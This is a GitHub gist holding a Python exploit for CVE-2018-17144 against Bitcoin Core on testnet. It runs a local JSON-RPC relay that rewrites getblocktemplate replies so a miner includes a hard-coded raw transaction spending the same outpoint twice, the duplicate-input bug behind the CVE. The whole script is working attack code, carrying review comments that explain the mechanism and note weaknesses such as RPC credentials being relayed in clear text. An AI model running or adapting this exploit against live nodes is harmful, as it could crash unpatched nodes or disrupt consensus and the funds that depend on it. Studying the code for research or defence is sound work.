
@gdassori
Created May 27, 2021 10:46
Exploiting CVE-2018-17144 on Bitcoin Testnet
# Exploiting CVE-2018-17144 on Bitcoin Testnet
# Guido Dassori, twitter.com/khs9ne
# https://bitcoindev.network/looking-back-on-exploiting-cve-2018-17144/
import typing
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
import requests
class JSONClient:
    """Minimal JSON-RPC 2.0 client that POSTs requests to one HTTP endpoint."""

    def __init__(self, host, port):
        # Plain HTTP: any credentials passed in ``headers`` to call() travel
        # unencrypted to this endpoint.
        self.url = "http://{}:{}".format(host, port)

    def call(self, method: str, params: typing.List=None, headers=None):
        """Send one JSON-RPC request and return the decoded JSON reply.

        Args:
            method: RPC method name.
            params: Positional parameters, sent as given (``None`` is sent as
                JSON ``null``).
            headers: Optional HTTP headers passed straight to ``requests``.

        Returns:
            The reply body parsed as JSON.
        """
        # The request id is always 1; replies are not matched against it here.
        body = json.dumps({
            "method": method,
            "params": params,
            "jsonrpc": "2.0",
            "id": 1,
        })
        # NOTE(review): no timeout is set, so a stalled endpoint blocks the
        # caller indefinitely, and a non-JSON reply raises from .json().
        reply = requests.post(self.url, data=body, headers=headers)
        return reply.json()
# Upstream node that every relayed request is forwarded to. 18332 is the
# default Bitcoin Core testnet RPC port; the host name is the author's own.
client = JSONClient(host='neuromante', port='18332')
class JSONRPCServer(BaseHTTPRequestHandler):
    """HTTP request handler for a local JSON-RPC relay that rewrites block templates.

    Every POST is forwarded to the module-level ``client`` and the reply is
    returned to the caller. For ``getblocktemplate`` the reply's transaction
    list is first replaced by one fixed transaction whose two inputs reference
    the same outpoint, which is the malformed shape behind CVE-2018-17144.
    Bitcoin Core 0.16.3 and later reject a block containing such a transaction
    (reject reason ``bad-txns-inputs-duplicate``).

    Nothing here validates the template: whatever consumes it trusts the RPC
    endpoint it was pointed at.
    """

    def do_POST(self):
        """Relay one JSON-RPC call upstream and write the reply back."""
        # NOTE(review): a request without Content-Length, 'method' or 'params'
        # raises here instead of producing a JSON-RPC error reply.
        body_length = int(self.headers['Content-Length'])
        raw_body = self.rfile.read(body_length)
        rpc_request = json.loads(raw_body.decode())

        # NOTE(review): this envelope is filled in below but never sent; the
        # upstream reply is what gets written to the caller.
        envelope = {
            "id": rpc_request.get("id"),
            "result": None,
            "error": None
        }

        # The caller's Authorization header is relayed unchanged, so this
        # process sees the node's RPC credentials in clear text.
        upstream_headers = {
            'content-type': 'application/json',
            'Authorization': self.headers['Authorization'],
        }
        print('Received Request %s' % rpc_request)

        method = rpc_request['method']
        upstream_reply = client.call(method, rpc_request['params'], headers=upstream_headers)
        print(method)
        print(type(method))

        if method == 'getblocktemplate':
            # Both inputs in "data" carry the same previous-output hash and
            # index. A transaction that repeats an outpoint is the pattern a
            # validator or block monitor should flag.
            duplicate_input_tx = {
                "txid": "fb7a8658ec015133e36e2cf7ddf7e8c887c3a5becec2f30f24ebfe43e72f4b59",
                "data": "0100000002d9bf9d812cfc91e3ff3b7f68e85269f64e7825de0fa61ff9dde117c73b72086a010000008b4830"
                        "45022100e412610b2e2b8370f2eda0cf29fe19c2a4ea35191d8b42656e81bc97026b229e022046ff1df7293f"
                        "8dbc3efd95b125ebf679a4a68e8de2265990ef7553f1060dc9e301410455fd1c1a6cbfb25b5bba1cf6f850de"
                        "00d79852be3de51e50c0da683613303c533d079e147dfe07ce4d40df2b776b35184698d14fa107a61e0976b0"
                        "d9416880c8ffffffffd9bf9d812cfc91e3ff3b7f68e85269f64e7825de0fa61ff9dde117c73b72086a010000"
                        "008a47304402206fa6ef6c0727ecf8d40b2b4648a93b084396c9819d20a3300e83ac4d110589e8022060c78d"
                        "44db1d5b5babd1629c55d8058643d11a14da933b4bc5f7a8a2a7da377301410455fd1c1a6cbfb25b5bba1cf6"
                        "f850de00d79852be3de51e50c0da683613303c533d079e147dfe07ce4d40df2b776b35184698d14fa107a61e"
                        "0976b0d9416880c8ffffffff01e00f9700000000001976a914c8b876680fef08df5278a9df92df7e30b83cbb"
                        "7188ac00000000",
                "hash": "fb7a8658ec015133e36e2cf7ddf7e8c887c3a5becec2f30f24ebfe43e72f4b59",
                "depends": [],
                "fee": 0.001 * 10 ** 8,
                "sigops": 8,
                "weight": 904
            }
            # The node's own transaction selection is discarded entirely.
            upstream_reply['result']['transactions'] = [duplicate_input_tx]

        envelope.update(upstream_reply)

        # Always answers 200, whatever the upstream call returned.
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(json.dumps(upstream_reply).encode())
if __name__ == '__main__':
    # Listens on loopback only, so just local processes can reach the relay.
    relay = HTTPServer(('localhost', 18161), JSONRPCServer)
    relay.serve_forever()